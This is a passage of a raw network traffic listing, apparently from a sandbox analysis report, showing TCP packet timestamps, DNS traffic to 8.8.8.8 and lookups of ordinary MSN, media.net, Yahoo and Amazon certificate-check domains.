                                        Sep 10, 2021 11:33:46.354188919 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354218960 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354258060 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354263067 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354269028 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354302883 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354346037 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354348898 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354350090 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354363918 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354418039 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354423046 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354469061 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354477882 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354495049 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354557037 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354562044 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354566097 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354617119 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354659081 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354660034 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354664087 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354672909 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354722023 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354727030 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354731083 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354779959 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354819059 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354824066 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354830027 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354834080 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354882002 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354885101 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354886055 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354901075 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354962111 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354964972 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354965925 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354979038 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355036020 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355041027 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355045080 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355088949 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355133057 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355142117 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355149031 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355190992 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355231047 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355232000 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355235100 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355243921 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355293036 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355297089 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355300903 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355344057 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355381966 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355386019 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355390072 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355393887 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355446100 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355451107 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355457067 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355469942 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355530977 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355535984 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355540037 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355595112 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355596066 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355611086 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355669975 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355675936 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355679989 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355691910 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355743885 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355753899 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355757952 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355770111 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355801105 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355837107 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355874062 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355880022 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355886936 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355890036 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355937004 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355941057 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355945110 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355958939 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.356021881 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.356028080 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.356031895 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.356564045 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.369194984 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.369389057 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.369405985 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.369477987 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.372294903 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.372406960 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.372570992 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:51.780335903 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:51.780462980 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:51.984167099 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:51.984282017 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:34:16.583816051 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.583959103 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.610209942 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.610240936 CEST804986013.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.610363007 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.610460997 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.615251064 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.624521017 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.624609947 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.628947973 CEST804986013.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.629134893 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.642028093 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.704760075 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.706470013 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.471602917 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.472501040 CEST4986480192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.498066902 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.498327971 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.498629093 CEST804986413.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.498737097 CEST4986480192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.499046087 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.508624077 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.508781910 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.525216103 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.584824085 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.584886074 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.696990013 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.705615044 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.723470926 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.723577976 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.724298000 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.733434916 CEST804990813.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.733541965 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.748198032 CEST804990813.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.748272896 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.751080036 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.753705025 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.758853912 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.813817978 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.813904047 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:46.637494087 CEST804986013.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:46.638531923 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:49.526247025 CEST804986413.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:49.532546043 CEST4986480192.168.2.513.225.29.132
                                        Sep 10, 2021 11:35:13.761585951 CEST804990813.225.29.132192.168.2.5
                                        Sep 10, 2021 11:35:13.761696100 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:35:15.557018995 CEST4994780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:15.557276964 CEST4994880192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:16.557615042 CEST4994780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:16.557625055 CEST4994880192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:18.557907104 CEST4994880192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:18.557907104 CEST4994780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:21.380172968 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:35:21.380201101 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:35:21.387341976 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:35:21.387363911 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:35:22.570374012 CEST4995380192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:22.571439981 CEST4995480192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:23.566916943 CEST4995380192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:23.582540035 CEST4995480192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:25.573657036 CEST4995380192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:25.589265108 CEST4995480192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:29.591558933 CEST4995780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:30.597425938 CEST4995780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:32.598104000 CEST4995780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:36.606376886 CEST4995880192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:37.621220112 CEST4995880192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:39.620636940 CEST4995880192.168.2.595.181.198.158

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 10, 2021 11:33:29.495970964 CEST6180553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:29.527220964 CEST53618058.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:32.121494055 CEST5479553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:32.157114983 CEST53547958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:32.696270943 CEST4955753192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:32.725291014 CEST53495578.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:33.125070095 CEST6173353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:33.151962996 CEST53617338.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:33.152764082 CEST6544753192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:33.192235947 CEST53654478.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:36.086319923 CEST5244153192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:36.095284939 CEST6217653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:36.123889923 CEST53621768.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:36.136873960 CEST53524418.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:36.695192099 CEST5959653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:36.734420061 CEST53595968.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:36.758147955 CEST6529653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:36.796466112 CEST53652968.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:38.973397017 CEST6318353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:39.015993118 CEST53631838.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:39.525027037 CEST6015153192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:39.570903063 CEST53601518.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:40.234529972 CEST5696953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:40.270116091 CEST53569698.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:40.362309933 CEST5516153192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:40.387788057 CEST53551618.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:41.667709112 CEST5475753192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:41.702008009 CEST53547578.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:45.004209042 CEST4999253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:45.029160976 CEST53499928.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:46.175139904 CEST6007553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:46.203030109 CEST53600758.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:53.592792034 CEST5501653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:53.628204107 CEST53550168.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:54.832622051 CEST6434553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:54.869067907 CEST53643458.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:57.395914078 CEST5712853192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:57.432851076 CEST53571288.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:58.412389040 CEST5479153192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:58.446048975 CEST53547918.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:59.444709063 CEST5046353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:59.473680019 CEST53504638.8.8.8192.168.2.5
                                        Sep 10, 2021 11:33:59.862677097 CEST5039453192.168.2.58.8.8.8
                                        Sep 10, 2021 11:33:59.917603970 CEST53503948.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:00.450212955 CEST5046353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:00.484285116 CEST53504638.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:01.219703913 CEST5853053192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:01.255086899 CEST53585308.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:01.505068064 CEST5046353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:01.539275885 CEST53504638.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:02.227888107 CEST5853053192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:02.262696028 CEST53585308.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:03.298697948 CEST5853053192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:03.324460983 CEST53585308.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:03.567023993 CEST5046353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:03.593482971 CEST53504638.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:05.330004930 CEST5853053192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:05.355936050 CEST53585308.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:06.988090992 CEST5381353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:07.023386002 CEST53538138.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:07.597098112 CEST5046353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:07.623796940 CEST53504638.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:09.385123014 CEST5853053192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:09.411264896 CEST53585308.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:09.563621998 CEST6373253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:09.593909025 CEST53637328.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:10.549390078 CEST6373253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:10.585346937 CEST53637328.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:11.582119942 CEST6373253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:11.617588043 CEST53637328.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:11.725733042 CEST5734453192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:11.760018110 CEST53573448.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:13.016001940 CEST5445053192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:13.049976110 CEST53544508.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:13.583610058 CEST6373253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:13.613729000 CEST53637328.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:14.403016090 CEST5926153192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:14.436084032 CEST53592618.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:16.528331995 CEST5715153192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:16.564980030 CEST53571518.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:17.324369907 CEST5941353192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:17.349891901 CEST53594138.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:18.020771027 CEST6373253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:18.053575993 CEST53637328.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:19.421375036 CEST6051653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:19.446614027 CEST53605168.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:20.207911968 CEST5164953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:20.241375923 CEST53516498.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:21.089966059 CEST6508653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:21.114537001 CEST53650868.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:21.620599031 CEST5643253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:21.659295082 CEST53564328.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:22.093854904 CEST6508653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:22.118855000 CEST53650868.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:23.095120907 CEST6508653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:23.130059004 CEST53650868.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:25.138557911 CEST6508653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:25.163172007 CEST53650868.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:26.283195019 CEST5292953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:26.309021950 CEST53529298.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:27.294908047 CEST5292953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:27.322992086 CEST53529298.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:28.343091965 CEST5292953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:28.368294954 CEST53529298.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:29.139142036 CEST6508653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:29.163806915 CEST53650868.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:30.397569895 CEST5292953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:30.422785997 CEST53529298.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:31.724658012 CEST6431753192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:31.763211012 CEST53643178.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:34.157807112 CEST6100453192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:34.185127974 CEST53610048.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:34.446589947 CEST5292953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:34.471842051 CEST53529298.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:35.158818007 CEST6100453192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:35.185277939 CEST53610048.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:36.173858881 CEST6100453192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:36.201181889 CEST53610048.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:38.220422983 CEST6100453192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:38.259454966 CEST53610048.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:40.442236900 CEST5689553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:40.470045090 CEST53568958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:40.870321989 CEST6237253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:40.907305002 CEST53623728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:41.451250076 CEST5689553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:41.479055882 CEST53568958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:42.264220953 CEST6100453192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:42.290637970 CEST53610048.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:42.450465918 CEST5689553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:42.482741117 CEST53568958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:42.660474062 CEST6151553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:42.695753098 CEST53615158.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:43.664731026 CEST5667553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:43.695419073 CEST53566758.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:44.497044086 CEST5689553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:44.526281118 CEST53568958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:48.511920929 CEST5689553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:48.546895981 CEST53568958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:48.889614105 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:48.915317059 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:49.902688026 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:49.928850889 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:50.923252106 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:50.949836016 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:52.919790983 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:52.947000980 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:56.947187901 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:56.973226070 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:15.510564089 CEST5526753192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:15.549719095 CEST53552678.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:17.039506912 CEST5096953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:17.081967115 CEST53509698.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:19.965210915 CEST6436253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:20.002125025 CEST53643628.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:43.641175985 CEST5476653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:43.676727057 CEST53547668.8.8.8192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Sep 10, 2021 11:33:32.696270943 CEST192.168.2.58.8.8.80xa44Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:36.086319923 CEST192.168.2.58.8.8.80xe127Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:36.695192099 CEST192.168.2.58.8.8.80x3680Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:36.758147955 CEST192.168.2.58.8.8.80xd023Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:39.525027037 CEST192.168.2.58.8.8.80xb102Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:40.234529972 CEST192.168.2.58.8.8.80xee12Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:41.667709112 CEST192.168.2.58.8.8.80xc5a9Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:45.004209042 CEST192.168.2.58.8.8.80xdc30Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:46.175139904 CEST192.168.2.58.8.8.80xb92fStandard query (0)s.yimg.comA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:16.528331995 CEST192.168.2.58.8.8.80xdcd5Standard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:19.421375036 CEST192.168.2.58.8.8.80x5ea4Standard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
